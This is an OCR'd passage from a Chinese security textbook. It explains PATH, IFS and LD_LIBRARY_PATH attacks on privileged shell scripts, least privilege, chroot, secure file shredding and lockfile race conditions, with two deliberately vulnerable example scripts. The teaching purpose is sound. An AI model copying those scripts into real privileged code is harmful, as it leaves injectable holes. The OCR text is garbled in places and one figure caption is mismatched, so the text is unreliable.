系统 的 更 大 权限 。 他 们 的 目标 是 通过 攻击 一 个 程序 获得 超级 用 户 或 者 管理 员 的 权限 ， 然 后 利用 
这 些 最 高 的 权限 执行 设计 的 攻击 代码 。 

一 些 早期 的 攻击 是 使 用 环境 变量 去 攻击 shell 脚本 ， 这 些 脚 本 以 其 所 有 者 的 权限 而 不 是 以 
正在 运行 它们 的 用 户 的 权限 在 执行 。 考 虑 图 11-6a 中 给 出 的 简单 脚本 。 一 个 ISP 可 能 使 用 这 段 
脚本 ， 获 取 一 些 用 户 的 身份 ， 如 果 其 中 包含 的 域 信息 被 去 除 ， 那 么 接着 就 能 获取 和 该 用 户 对 应 
AY IP 地址 。 由 于 该 信息 保存 在 需要 特权 才能 访问 的 用 户 账户 信息 目录 中 ， 针 对 该 目录 的 一 般 
访问 是 被 不 允许 的 。 而 这 段 脚本 以 其 所 有 者 的 权限 运行 ， 对 上 述 相关 目录 具有 访问 权限 。 这 种 
类 型 的 简单 脚本 在 很 多 系统 上 都 很 常见 。 然 而 ， 它 包含 大 量 的 严重 缺陷 。 第 一 个 缺陷 涉及 与 环 
境 变量 PATH 的 交互 。 这 段 简单 的 脚本 调用 两 个 不 同 的 程序 ， sed 和 grep。 程 序 员 假设 这 两 个 
程序 的 标准 系统 版 本 会 被 调用 。 但 此 处 只 是 指定 了 文件 名 。 为 了 找到 具体 的 程序 ，shell 将 到 
PATH 变量 指定 的 目录 中 查找 对 应 的 文件 和 名。 攻击 者 只 需要 简单 地 重 定义 变量 PATH， 使 其 包 
含 攻击 者 控制 的 目录 ， 比 如 该 目录 中 包含 一 个 grep 程序 。 当 脚本 运行 时 ， 攻 击 者 的 程序 grep 
代替 程序 的 标准 系统 版 本 被 调用 。 这 样 这 个 程序 就 可 以 按照 攻击 者 的 意愿 做 任何 事 ， 因 为 它 具 
有 shell 脚本 所 具有 的 权限 。 为 了 消除 这 个 漏洞 ， 该 脚本 可 以 改 为 对 每 个 程序 都 使 用 其 绝对 路 
径 名 。 这 样 可 以 避免 变量 PATH 的 使 用 ， 但 是 这 会 使 脚本 的 可 读 性 和 可 移植 性 丧失 。 或 者 ， 变 
量 PATH 可 以 被 重 设 为 脚本 已 知 的 默认 值 ， 如 图 11-6b 所 示 。 不 幸 的 是 ， 这 个 版 本 的 脚本 程序 
也 还 有 漏洞 ， 这 次 是 因为 IFS 变量 。 该 变量 被 用 来 区 分 一 行 命令 中 的 不 同 单词 。 默 认 情 况 下 为 
空格 、 制 表 符 或 换行 符 。 然 而 ， 可 以 将 它 设置 成 任意 的 字符 序列 。 我 们 考虑 在 该 集合 中 包含 
“二 ”的 影响 。 接 下 来 给 变量 PATH 赋 一 个 新 值 被 解释 成 执行 程序 PATH 的 命令 ， 而 后 面 的 目 
录 列表 被 视 为 程序 参数 。 如 果 攻 击 者 也 修改 变量 PATH 加 入 了 包含 攻击 程序 PATH 的 目录 ， 那 
么 当 脚 本 运行 时 ， 攻 击 程序 就 会 被 执行 。 从 本 质 上 讲 ， 我 们 无 法 避免 这 种 类 型 的 针对 shell 肢 
本 的 攻击 。 在 最 坏 的 情况 下 ， 如 果 脚 本 以 root 用 户 的 身份 执行 ,那么 对 整个 系统 的 破坏 也 是 
可 能 的 。 目 前 的 一 些 UNIX 系统 已 经 阻止 对 一 些 关键 环境 变量 的 设置 ， 比 如 以 root 用 户 身份 
运行 的 程序 中 使 用 的 环境 变量 。 然 而 ， 这 并 不 能 阻止 对 以 其 他 用 户 身份 运行 的 程序 的 攻击 ， 因 
此 攻击 者 还 是 可 能 获取 对 系统 的 更 高 访问 权限 。 


#!/bin/bash 
user="echo $1 |sed 's/@.*$//'~ 


grep $user /var/local/accounts/ipaddrs 


a) 易 受 攻击 的 特权 shell 脚 本 





#!/bin/bash 
PATH="/sbin:/bin:/usr/sbin:/usr/bin" 
export PATH 


user="echo $1 [sed 's/@.*$//'~ 
grep $user /var/local/accounts/ipaddrs 


b) (改进 后 的 ) 仍 存 在 漏洞 的 特权 shell 脚 本 
图 11-6 存在 漏洞 的 shell 脚本 





一 般 来 讲 ， 编 写 安 全 的 、 高 优先 级 的 shell 脚本 是 很 困难 的 。 因 而 ， 我 们 并 不 推荐 使 用 
shell 脚本 。 我 们 建议 最 好 修改 组 身份 ( group identity) 而 不 是 用 户 身 份 (user identity)， 并 将 所 
有 的 关键 环境 变量 重新 设置 。 这 至 少 保证 攻击 者 不 会 获取 超级 用 户 权限 。 如 果 需 要 一 个 脚本 应 
用 程序 ， 最 好 的 解决 方法 是 使 用 一 个 编译 过 的 包装 函数 (wrapper function) 调用 它 。 在 调用 脚 
本 程序 前 ， 用 一 个 编译 好 的 程序 构建 一 个 相对 安全 的 环境 变量 集合 ， 然 后 使 用 该 程序 完成 属 主 
或 组 的 改变 。 如 果 上 述 过 程 正确 实现 的 话 ， 这 就 提供 了 一 个 安全 执行 此 类 脚本 的 机 制 。 目 前 这 
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种 方法 的 使 用 已 经 有 了 很 好 的 典范 ， 在 Apache Web 服务 器 上 执行 用 户 CGI 脚本 时 使 用 了 包装 
函数 suexec， 这 个 包装 函数 在 构建 一 个 安全 的 环境 并 执行 指定 脚本 之 前 完成 了 一 系列 周密 的 安 
全 检查 。 

尽管 以 高 优先 级 运行 的 是 编译 过 的 程序 ， 但 是 攻击 者 仍然 可 能 利用 环境 变量 进行 攻击 。 如 
果 这 个 程序 执行 另 一 个 程序 ， 依 据 执行 时 使 用 的 命令 ， 变 量 PATH 仍然 能 被 用 于 寻找 将 要 执行 
的 程序 。 因 而 ， 所 有 这 类 程序 必须 首先 将 其 重 设 为 已 知 的 安全 值 。 至 少 这 个 工作 可 以 安全 地 完 
成 。 然 而 ， 在 这 个 过 程 中 还 有 其 他 的 漏洞 存在 。 从 根本 上 讲 ， 在 现代 操作 系统 上 ， 所 有 的 程序 
都 使 用 标准 库 例 程 提供 的 功能 。 当 程序 被 编译 和 链接 的 时 候 ， 标 准 库 中 的 代码 被 加 载 到 可 执行 
程序 文件 中 ， 这 被 称 为 静态 链接 。 使 用 静态 链接 ， 每 个 程序 将 它 自 己 对 这 些 标准 库 的 拷贝 装载 
到 计算 机 的 内 存 中 。 这 是 非常 浪费 资源 的 ， 因 为 所 有 拷贝 都 是 相同 的 。 因 此 ， 大 多 数 现代 操作 
系统 都 支持 动态 链接 的 概念 。 一 个 动态 链接 的 可 执行 程序 并 不 包含 这 些 公共 库 中 的 代码 ， 而 是 
包含 一 个 表 ， 其 中 包含 所 需 使 用 的 所 有 函数 的 名 字 和 指向 该 函数 的 指针 。 当 程序 被 装载 到 一 个 
进程 时 ， 该 表 可 以 解决 对 任何 库 的 一 个 单一 拷贝 的 引用 ， 而 这 个 拷贝 为 所 有 需要 它 的 进程 所 共 
享 。 然 而 ， 不 同 的 程序 有 时 可 能 需要 使 用 不 同 版 本 的 函数 库 中 同名 的 库 函 数 。 因 而 ， 通 常 存在 
一 种 方法 指定 一 个 目录 列表 来 动态 查找 已 加 载 的 库 。 在 很 多 UNIX 系统 上 ， 这 是 环境 变量 LD_ 
LIBRARY PATH 的 功能 。 该 变量 的 使 用 对 动态 库 的 使 用 提供 了 一 定 的 灵活 度 。 但 同样 它 也 引 
人 了 一 些 可 能 的 攻击 机 制 。 攻 击 者 构造 一 个 通用 库 的 自 定 义 版 本 ， 将 已 知 的 、 当 程序 执行 时 能 
被 动态 链接 的 库 函 数 的 代码 替换 成 攻击 代码 。 通 过 设置 变量 LD_LIBRARY_PATH,， 程序 将 首 
先 引 用 含有 攻击 代码 版 本 的 库 函 数 ， 当 程序 执行 的 时 候 调 用 该 库 函 数 ， 攻 击 代码 就 会 利用 目标 
程序 的 特权 运行 。 为 了 避免 这 类 攻击 ， 程 序 员 可 以 对 可 执行 程序 进行 静态 链接 ， 但 是 付出 的 代 
价 是 内 存 利用 率 不 高 。 另 外 ， 也 有 一 些 操作 系统 ， 当 程序 以 不 同 优先 级 执行 时 ， 不 允许 使 用 这 
个 环境 变量 。 

最 后 ， 除 了 使 用 标准 环境 变量 外 ， 很 多 程序 还 使 用 自 定义 变量 ， 人 允许 用 户 在 启动 (startup) 
脚本 中 通过 为 这 些 变量 设置 不 同 的 值 来 改变 程序 的 行为 。 同 样 ， 这 样 的 用 法 意味 着 这 些 变量 也 
会 给 程序 引入 不 可 信 的 输入 ， 因 而 程序 还 是 需要 进行 验证 。 将 这 些 变量 的 值 和 其 他 信息 进行 合 
并 后 放 到 缓冲 区 中 可 能 还 会 发 生 一 个 特定 的 危险 。 如 果 程 序 员 不 小 心 ， 就 会 出 现 缓冲 区 溢出 ， 
这 会 带 来 像 我 们 在 第 10 章 中 讨论 的 那样 的 后 果 。 另 外 ， 像 我 们 在 11.2 节 中 讨论 的 那样 ， 在 对 
文本 信息 正确 解释 的 过 程 中 所 出 现 的 问题 在 此 也 可 能 出 现 。 

所 有 这 些 例 子 表明 ， 我 们 要 仔细 地 识别 程序 与 它 执 行 时 所 处 的 系统 的 交互 方式 ， 仔 细 考 虑 
这 些 假设 中 的 安全 隐患 。 


11.4.2 ”使 用 合适 的 最 小 特权 


在 这 一 章 和 第 10 章 中 ， 我 们 讨论 了 很 多 程序 的 漏洞 ， 由 此 造成 的 后 果 是 攻击 者 能 够 利用 
受到 攻击 的 程序 或 服务 的 特权 和 访问 权限 来 执行 代码 。 如 果 这 些 特权 比 本 来 为 攻击 者 分 配 的 权 
限 高 ， 就 会 导致 特权 扩大 (privilege escalation)， 在 攻击 过 程 中 ， 这 是 很 重要 的 一 步 。 拥 有 更 
高 级 别 的 特权 可 能 导致 攻击 者 修改 系统 ， 保 证 攻击 者 以 后 仍 能 使 用 这 些 需要 较 高 特权 的 程序 。 
因此 我 们 强烈 建议 每 个 程序 都 应 该 使 用 完成 其 功能 所 需 的 最 小 特权 。 这 就 是 最 小 特权 (least 
privilege) 原则 ， 人 们 已 经 普遍 认识 到 它 是 安全 程序 的 一 个 理想 特性 。 

正常 情况 下 ， 当 用 户 运行 一 个 程序 的 时 候 ， 该 程序 应 该 和 用 户 具 有 相同 的 优先 级 和 访问 
权限 。 利 用 这 些 程序 的 漏洞 并 不 能 使 攻击 者 在 优先 级 方面 有 什么 收获 ， 尽 管 攻击 者 可 能 还 有 其 
他 目的 ， 比 如 对 程序 进行 拒绝 服务 攻击 。 然 而 ， 很 多 情况 下 ， 程 序 需 要 使 用 一 些 该 用 户 未 被 授 
权 访 问 的 资源 。 这 可 能 通过 提供 一 个 标准 系统 机 制 支持 的 更 细 的 访问 控制 粒度 来 完成 。 通 常 的 
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做 法 是 对 一 个 服务 采用 一 个 专门 的 系统 登录 ， 并 且 仅 登录 者 可 以 访问 该 服务 所 使 用 的 目录 和 文 
件 。 实 现 该 服务 的 任何 一 个 程序 都 使 用 系统 用 户 的 访问 权限 运行 ， 这 样 的 程序 被 视 为 特权 程 
序 。 不 同 的 操作 系统 提供 不 同 的 机 制 支持 这 个 概念 。UNIX 系统 使 用 set user 或 set group 选项 。 
Windows 系统 中 使 用 的 访问 列表 提供 一 种 机 制 ， 在 需要 的 情况 下 可 以 指定 可 选 的 用 户 或 组 的 访 
问 权限 。 我 们 在 第 4 章 中 深入 讨论 过 这 些 访问 控制 的 概念 。 

无 论 何 时 ， 当 特权 程序 运行 时 ， 我 们 必须 仔细 确定 合适 的 用 户 和 组 所 需 的 优先 级 。 任 何 
这 样 的 程序 ， 都 是 想 获得 额外 优先 权 的 攻击 者 的 潜在 目标 ， 正 如 我 们 前 面 讨论 环境 变量 和 特权 
shell 脚本 的 安全 时 所 担心 的 。 一 个 关键 决策 是 在 提高 组 优先 级 的 同时 也 提高 用 户 优先 级 ， 还 
是 仅仅 提高 组 优先 级 。 如 果 可 以 的 话 ， 后 者 更 合适 。 这 是 因为 在 UNIX 和 其 相关 的 系统 上 ， 被 
创建 的 任何 文件 都 将 运行 程序 的 用 户 作为 文件 的 属 主 ， 这 能 够 使 用 户 更 容易 被 识别 。 如 果 附 加 
的 特殊 用 户 优先 权 被 授权 ， 这 个 特殊 用 户 就 是 任何 新 创建 文件 的 属 主 ， 而 掩盖 了 运行 程序 的 用 
户 的 身份 。 然 而 ， 有 些 情况 仅仅 提高 组 访问 优先 权 并 不 能 满足 要 求 。 在 这 些 情 况 下 ， 程 序 员 需 
要 仔细 管理 这 些 程序 的 使 用 ， 如 果 有 必要 可 以 记录 日 志 。 

另 一 个 需要 关心 的 问题 是 保证 任何 特权 程序 仅 能 修改 所 需 的 文件 和 目录 。 很 多 特权 程序 存 
在 不 足 ， 对 所 有 相关 的 文件 和 目录 都 有 所 有 权 。 一 旦 程序 受到 攻击 ， 攻 击 者 就 可 能 拥有 更 大 的 
权限 来 修改 和 损坏 系统 。 这 有 人 悖 于 最 小 特权 原则 ， 例 如 在 很 多 Web 服务 器 和 它们 的 文档 目录 
的 配置 中 都 存在 这 个 不 足 。 在 大 部 分 系统 上 ，Web 服务 器 利用 一 个 特殊 用 户 的 特权 运行 ， 一 
WE WWW 或 类 似 的 用 户 。 通 常 Web 服务 器 对 正在 提供 服务 的 文件 仅 需要 读 的 能 力 。 它 需要 
写 访问 的 文件 ， 用 来 存储 那些 由 CGI 脚本 、 文 件 上 传 等 提供 的 信息 。 其 他 所 有 文件 应 该 对 管 
理 它们 的 用 户 组 具有 写 权限 ， 而 不 是 对 Web 服务 器 。 然 而 ， 一 个 安全 意识 不 强 的 系统 管理 者 ， 
常常 将 Web 文档 体系 中 大 多 数 文件 的 所 有 权 分 配给 Web 服务 器 。 如 果 Web 服务 器 受到 威胁 ， 
攻击 者 就 可 能 修改 大 多 数 文件 。 广 泛 发 生 的 Web RIR (defacement) 攻击 就 有 类 似 的 后 果 。 服 
务 器 通常 受到 11.2 节 中 介绍 的 PHP 远程 代码 注 和 攻击 的 威胁 。 这 种 攻击 使 得 攻击 者 能 以 Web 
服务 器 的 优先 级 运行 任何 选择 好 的 PHP 代码 。 攻 击 者 也 能 替换 服务 器 拥有 写 权 限 的 那些 页 面 。 
如 果 攻 击 者 访问 或 修改 以 前 的 CGI 脚本 用 户 保存 的 表格 数据 ， 就 会 导致 更 严重 的 后 果 。 

给 特权 程序 管理 的 文件 和 目录 分 配 正确 的 文件 和 组 所 有 权时 ， 要 格外 小 心 。 特 别 是 当 程 序 
从 一 个 计算 机 系统 转移 到 另 一 个 系统 中 ， 或 者 操作 系统 进行 大 的 更 新 时 ， 可 能 会 出 现 问题 。 新 
的 系统 可 能 会 对 这 些 用 户 和 组 采用 不 同 的 默认 值 。 如 果 相 关 的 程序 、 文 件 和 目录 并 没有 被 完全 


正确 地 更 新 ， 那 么 就 不 能 像 所 期 望 的 那样 提供 服务 ， 或 者 服务 可 以 访问 它 不 应 该 访问 的 文件 ，- 


从 而 导致 文件 受到 破坏 。 当 将 Web 服务 器 移动 到 一 个 新 的 不 同 的 系统 上 时 ，Web 服务 器 用 户 
可 能 从 www 换 成 www-data， 这 时 也 会 发 生 类 似 的 安全 问题 。 受 到 影响 的 文件 可 能 不 仅 是 主 
Web 服务 器 文档 体系 中 的 文件 ， 还 可 以 是 用 户 公 共 Web 目录 中 的 文件 。 

和 特权 程序 相关 的 最 大 的 安全 问题 ， 出 现在 程序 以 ro 或 者 管理 员 权 限 运行 的 时 候 。 这 
时 该 程序 对 系统 拥有 很 高 的 访问 和 控制 权限 。 获 取 这 样 的 权限 正 是 系统 攻击 者 的 主要 目的 ， 因 
而 这 些 特权 程序 也 成 了 攻击 者 的 主要 目标 。 最 小 特权 原则 要 求 访问 权限 应 该 尽 可 能 地 小 ， 时 间 
也 应 尽 可 能 地 短 。 不 幸 的 是 ， 由 于 操作 系统 本 身 的 设计 ， 以 及 限制 基础 系统 资源 访问 的 需要 ， 
在 有 些 情况 下 ， 这 些 访问 必须 被 授权 。 这 方面 比较 经 典 的 例子 包括 允许 用 户 登 录 或 改变 系统 密 
码 的 程序 ， 这 些 程序 仅 root 用 户 可 以 访问 。 另 一 个 常见 的 例子 ， 是 需要 绑 定 一 个 特权 服务 端 
口 9 的 网 络 服务 程序 。 比 如 Web、 安 全 shell (SSH), SMTP 邮件 投递 程序 和 DNS 等 很 多 其 他 


O 特权 网 络 服务 使 用 的 端口 数目 少 于 1024 个 。 在 UNIX 和 相关 的 系统 中 只 有 root 用 户 被 赋予 绑 定 这 些 端 口 的 
特权 。 
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服务 程序 。 一 般 而 言 ， 这 些 服务 程序 在 运行 期 间 都 一 直 拥 有 root 用 户 权 限 。 如 果 对 其 特权 进 
行进 一 步 的 考查 ， 我 们 发 现 只 需要 在 初始 时 将 root 用 户 权 限 绑 定 到 需要 的 特权 端口 上 。 一 旦 
完成 这 个 工作 ， 服 务 器 程序 就 可 以 将 用 户 的 特权 减少 为 另 一 个 特殊 的 系统 用 户 的 特权 ， 这 样 随 
后 的 攻击 所 造成 的 危害 就 小 多 了 。 以 前 广泛 使 用 的 sendmail 邮件 投递 程序 存在 大 量 的 安全 漏 
洞 ， 原 因 就 在 于 这 个 复杂 的 程序 自始至终 都 以 root 用 户 权 限 运行 。 

现在 我 们 考虑 良好 的 防御 性 程序 设计 准则 ， 大 的 复杂 程序 应 尽量 分 解 成 小 模块 ， 每 个 
模块 仅 在 需要 的 时 候 拥有 相应 的 访问 权限 。 这 种 程序 的 模块 化 设计 思路 使 得 模块 间 的 隔离 度 
(degree of isolation) 更 大 ， 也 降低 了 在 一 个 组 件 中 的 安全 问题 的 影响 范围 。 另 外 ， 由 于 模块 比 
较 小 ， 每 个 模块 更 易于 测试 和 验证 。 理 想 情况 下 ， 需 要 高 优先 级 的 少数 组 件 可 以 保持 短小 的 模 
式 ， 相 对 于 程序 的 其 他 部 分 它们 需要 受到 更 加 详细 的 审查 。 很 多 机 构 使 用 的 sendmail 邮件 投 
递 程序 现在 已 经 被 postfix 邮件 投递 程序 代替 ， 部 分 原因 是 postfix 邮件 投递 程序 采用 了 这 些 更 
安全 的 设计 准则 。 

最 小 化 特权 的 更 进一步 技术 ， 是 在 一 个 特定 分 隅 出 的 与 文件 系统 隔离 的 区 域内 运行 存在 潜 
在 漏洞 的 程序 。UNIX 及 其 相关 系统 提供 了 系统 函数 chroot， 这 个 函数 将 程序 的 文件 系统 视图 
限制 在 一 个 仔细 配置 的 区 域内 ， 这 就 是 chroot jail。 在 chroot jail 被 正确 配置 的 情况 下 ， 尽 管 程 
序 受 到 威胁 ,但 它 仅 可 以 访问 或 修改 chroot jail 区 域内 的 文件 。 不 幸 的 是 ， 对 chroot jail HET 
正确 配置 是 相当 困难 的 。 如 果 配 置 不 正确 ， 程 序 可 能 运行 失败 ， 或 者 出 现 更 坏 的 情况 ， 就 是 攻 
击 者 仍然 可 能 同 jail 外 的 文件 进行 交互 。chroot jail 的 使 用 可 以 限制 文件 受到 破坏 ， 但 它 并 不 适 
用 于 所 有 的 情况 ， 也 不 是 完全 的 安全 解决 方案 。 


11.4.3 ”系统 调用 和 标准 库 函 数 


除了 很 小 的 嵌入 式 系统 ， 没 有 计算 机 程序 可 以 包含 它 执 行 时 所 需要 的 全 部 代码 。 程 序 通过 
操作 系统 调用 来 使 用 系统 资源 ， 通 过 调用 标准 库 函 数 完 成 通常 的 操作 。 在 使 用 这 些 函 数 时 ， 程 
序 员 通 常 假设 这 些 函数 能 够 按照 预期 正常 运行 。 大 多 数 情 况 下 这 些 函 数 的 确 是 如 所 期 望 的 那样 
运行 ,但 在 程序 员 对 这 些 函 数 做 出 的 假设 不 正确 时 ， 会 出 现 一 些 问题 ， 造 成 程序 没有 按照 其 所 
期 望 的 那样 执行 。 造 成 这 种 情况 的 部 分 原因 在 于 程序 员 的 注意 力 更 多 地 集中 在 他 自己 所 开发 的 
程序 上 ， 没 有 注意 与 环境 的 联系 。 然 而 ， 更 多 情况 下 ， 这 个 程序 只 是 运行 并 使 用 可 用 系统 资源 
的 众多 程序 中 的 一 个 。 操 作 系 统 和 库 函 数 的 作用 是 管理 资源 ， 目 标 是 为 在 系统 上 运行 的 程序 提 
供 最 好 的 性 能 。 这 使 得 服务 请 求 可 以 通过 缓存 、 重 新 排序 或 其 他 的 修改 对 系统 的 使 用 进行 优 
化 。 不 幸 的 是 ， 有 时 系统 优化 与 程序 的 目标 会 产生 冲突 。 除 非 程序 员 了 解 它们 彼此 间 的 相互 作 
用 关系 ， 清 楚 如 何 通过 编码 解决 这 些 问题 ， 否 则 程序 不 会 按照 其 预期 的 目标 执行 。 

Venema 在 有 关 设 计 安 全 的 文件 粉碎 (file shredding) 程序 的 讨论 中 ， 提 供 了 一 个 非常 好 的 
说 明 [VENE06]。 安 全 的 文件 粉碎 是 指 删 除 一 个 文件 后 其 内 容 不 能 恢复 。 仅 使 用 标准 文件 删除 
应 用 程序 或 者 系统 调用 是 不 够 的 ， 因 为 这 仅 是 将 文件 名 与 内 容 的 链接 进行 了 删除 ， 而 文件 内 容 
仍然 存在 于 硬盘 中 ， 这 些 内 容 块 还 可 能 被 其 他 的 文件 重新 使 用 。 删 除 操作 的 逆 操 作 是 很 简单 
的 ， 因 为 撤销 删除 (undelete) 程序 已 经 使 用 很 多 年 了 。 即 使 删除 的 文件 内 容 块 被 再 利用 ， 文 件 
中 的 数据 仍 可 能 恢复 ， 因 为 并 非 所 有 先前 的 位 值 (bit value) 踪迹 都 被 删除 [GUTM96]。 因 此 ， 
我 们 建议 利用 多 个 不 同 的 位 模式 (bit pattem) 反复 覆盖 数据 内 容 ， 使 得 与 原来 的 数据 具有 较 大 
的 差异 。 因 此 ， 一 个 好 的 文件 粉碎 程序 可 以 实现 图 11-7a 所 示 的 算法 。 然 而 ， 即 使 该 算法 得 到 
非常 好 的 实现 ， 文 件 内 容 还 会 被 恢复 。Venema 详细 指出 了 算法 中 存在 的 缺陷 ， 这 些 缺 陷 是 导 
致 程序 不 能 像 所 期 望 的 那样 执行 的 原因 。 这 些 缺 陷 与 一 些 错误 的 假设 有 关 ， 假 设 的 内 容 是 关于 
相关 的 系统 函数 如 何 操作 ， 主 要 的 缺陷 包括 : 


BIS KHBH 287 


© 在 文件 以 写 的 方式 打开 时 ， 系 统 需要 将 新 的 数据 当 作 原来 的 数据 写 到 相同 的 磁盘 块 。 
在 实现 过 程 中 ， 操 作 系统 假设 原来 的 数据 不 再 需要 ， 它 删除 这 些 数据 与 文件 的 关联 ， 
将 新 的 没有 使 用 的 块 分 配给 需要 写 人 的 数据 。 这 时 程序 需要 做 的 是 ， 打 开 需 要 修改 的 
文件 ， 告 知 操作 系统 原来 的 数据 仍然 需要 。 
当 文 件 被 某 个 样本 覆盖 的 时 候 ， 数 据 立即 写 和 硬盘。 第 一 步 是 将 数据 拷贝 到 一 个 应 用 
程序 的 缓冲 区 中 ， 由 标准 库 文件 WO 例 程 管理 。 这 些 例 程控 制 着 缓冲 区 的 写 人 ， 直 到 
缓冲 区 充满 之 后 ， 程 序 刷新 缓冲 区 ， 或 者 关闭 文件 。 如 果 文 件 比 较 小 ， 在 程序 循环 执 
行 、 返 回 到 文件 的 开始 以 及 写 人 新 的 样本 之 前 缓冲 区 不 会 充满 。 在 这 种 情况 下 ， 库 代 
码 决 定 没有 必要 再 向 硬盘 写 数据 ， 因 为 以 前 写 和 人 的 数据 已 经 使 文件 发 生 了 变化 。 程 序 
需要 明确 做 到 在 写 入 一 个 样本 之 后 ， 必 须 刷新 缓冲 区 。 
当 刷 新 VO 缓冲 区 以 及 关闭 文件 的 时 候 ， 数 据 被 写 人 硬盘 。 然 而 ， 在 操作 系统 的 文件 
处 理 代码 中 还 有 另外 一 层 缓冲 ， 这 一 层 缓冲 区 存储 在 操作 系统 上 当前 正在 运行 的 所 有 
进程 读 写 文件 的 信息 ， 它 对 这 些 读 写 的 数据 进行 重组 或 调度 ， 使 其 更 利于 物理 设备 的 
高 效 访问 。 即 使 程序 把 来 自 应 用 程序 的 缓冲 区 的 数据 刷新 到 文件 系统 的 缓冲 区 ， 数 据 
， 将 不 会 被 立即 写 和 人。 如 果 新 的 蔡 代 数据 被 刷新 ， 它 们 很 可 能 再 次 替代 原来 未 被 写 人 磁 
盘 的 数据 ， 因 为 文件 系统 代码 将 假设 早先 的 值 不 再 需要 ， 而 且 该 替代 数据 也 可 能 没有 
被 写 人 硬盘 。 因 此 程序 必须 强制 文件 系统 中 的 数据 与 设备 上 的 值 同 步 ， 才 能 确保 数据 
被 实际 地 传送 到 设备 上 。 然 而 ， 这 样 的 结果 将 导致 系统 性 能 降低 ， 因 为 它 使 设备 访问 
次 数 增加 。 这 种 代价 不 只 反映 在 文件 粉碎 程序 ， 而 是 当前 运行 在 系统 上 的 所 有 程序 。 
针对 这 些 变化 ， 安 全 文件 粉碎 程序 算法 调整 为 图 11-7b 所 示 的 情况 。 这 当然 更 可 能 达到 预 
期 的 结果 ， 然 而 仔细 分 析 起 来 ， 还 涉及 更 多 的 问题 。 


patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, 
] 


open file for writing 
for each pattern 
Seek to start of file 
overwrite file contents with pattern 
close file 
remove file 





a) 初始 的 安全 文件 粉碎 程序 算法 
patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, 
paw] 
open file for update 


for each pattern 
seek to start of file 


overwrite file contents with pattern 

flush application write buffers 

sync file system write buffers with device 
close file 
remove file 





b) 较 好 的 安全 文件 粉碎 程序 算法 
图 11-7 全 局 数据 溢出 攻击 示例 


现代 的 磁盘 驱动 器 和 其 他 存储 设备 是 由 智能 控制 器 管理 的 ， 智 能 控制 器 自 带 内 存 的 专用 处 
理 器 。 当 操作 系统 将 数据 传送 到 这 些 设备 上 时 ， 数据 被 存储 在 控制 器 内 存 的 缓冲 区 中 。 控 制 器 
也 会 对 传送 到 真实 设备 的 传送 队列 进行 优化 。 如 果 发 现 相 同 的 数据 块 被 重复 写 了 多 次 ， 控 制 器 
将 丢弃 先前 的 数据 值 。 为 了 预防 该 情况 的 发 生 ， 程 序 将 采取 措施 指示 控制 器 写 这 些 处 理 中 的 数 
据 。 遗 憾 的 是 ， 各 类 操作 系统 上 并 没有 一 个 标准 的 机 制 实现 这 种 需求 。 当 Apple 正 开 发 自己 的 
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Mac OS X 安全 文件 删除 程序 时 ， 又 发 现 通过 增加 一 个 额外 的 文件 控制 选项 e 来 产生 该 命令 很 
有 必要 。 而 且 它 的 使 用 会 引起 进一步 的 性 能 代价 。 但 仍然 有 更 多 的 问题 。 如 果 设 备 不 是 磁盘 
(如 闪存 驱动 器 )， 则 它们 的 控制 器 将 尽 可 能 地 减少 写 数据 块 的 次 数 。 这 是 因为 这 些 设备 只 支持 
有 限 次 数据 块 的 写 人 操作 。 其 解决 方法 是 ， 在 数据 重 写 时 可 以 分 配 新 的 块 ， 而 不 是 重复 使 用 已 
经 存在 的 块 。 另外， 一 些 类 型 的 日 志文 件 系统 保存 着 文件 发 生 改 变 的 所 有 记录 ， 目 的 是 在 硬盘 
发 生 损 坏 时 这 些 文件 能 够 快速 恢复 。 而 且 这 些 记录 也 能 用 于 访问 修改 前 的 数据 内 容 。 

以 上 表明 ， 写 一 个 安全 文件 粉碎 程序 的 确 非 常 困难 。 它 包括 很 多 层 的 代码 ， 每 一 层 都 假设 
对 程序 的 实际 需求 能 够 提供 最 好 的 性 能 。 当 这 些 假设 与 程序 的 目标 冲突 时 ， 程 序 将 不 再 按照 其 
所 期 望 的 执行 。 安 全 程序 员 需 要 识别 这 些 假设 ， 并 能 解决 其 与 程序 目标 的 各 种 冲突 。 由 于 识别 
相关 的 假设 可 能 非常 困难 ， 也 就 是 说 需要 穷尽 所 有 的 测试 条 件 ， 才 能 保证 程序 按照 其 所 期 望 的 
执行 。 当 程序 不 能 按 所 期 望 的 执行 时 ， 需 要 确定 造成 该 情况 的 原因 ， 识 别 无 效 的 假设 并 对 其 进 
行 修改 。 

Venema 在 其 讨论 中 总 结 到 : 事实 上 ， 程 序 可 能 正在 解决 这 种 错误 的 问题 。 在 删除 文件 前 ， 
比试 图 毁坏 文件 内 容 更 好 的 办 法 是 ， 在 文件 系统 和 交换 空间 中 覆盖 所 有 当前 没有 使 用 的 块 ， 包 
括 那些 从 当前 删除 的 文件 中 释放 的 块 。 


11.4.4 ”阻止 共享 系统 资源 的 竞争 条 件 的 产生 


在 很 多 情况 下 ， 多 个 程序 需要 访问 公共 系统 资源 ， 一 个 文件 包含 多 个 程序 产生 和 操作 的 数 
据 。 例 如 ， 邮 件 客 户 端 和 邮件 投递 程序 共享 访问 用 户 信箱 中 的 文件 。 又 如 ， 一 个 Web CGI 脚 
本 的 多 个 用 户 更 新 一 个 保存 提交 的 表单 内 容 的 文件 。 这 是 共享 内 存 同步 访问 问题 的 一 个 变 体 ， 
该 问题 在 11.3 节 中 我 们 已 经 进行 了 讨论 。 在 那里 ， 解 决 该 问题 的 方法 是 使 用 一 个 合适 的 同步 
机 制 使 得 访问 串 行 化 ， 这 样 就 可 以 阻止 错误 的 产生 。 常 用 的 技术 是 在 共享 的 文件 上 设 定 一 个 
锁 〈lock)， 保 证 每 个 进程 轮流 访问 。 一 些 方法 可 以 实现 该 机 制 ， 但 这 些 方法 依赖 于 使 用 的 操作 
系统 。 

最 早 也 是 最 常用 的 技术 是 使 用 一 个 文件 锁 (lockfile)。 一 个 进程 必须 创建 和 拥有 文件 锁 ， 
这 样 才 可 以 获取 对 共享 资源 的 访问 。 任 何 检测 到 文件 锁 存 在 的 其 他 进程 必须 等 待 ， 直 到 该 文件 
锁 被 撤销 ， 它 才能 创建 自己 的 文件 锁 来 获取 访问 权 。 使 用 这 种 方法 也 有 一 些 相关 的 问题 。 首 
先 ， 它 完全 是 建议 性 的 。 如 果 一 个 程序 选择 忽略 文件 锁 的 存在 并 访问 共享 资源 ， 系 统 将 不 会 阻 
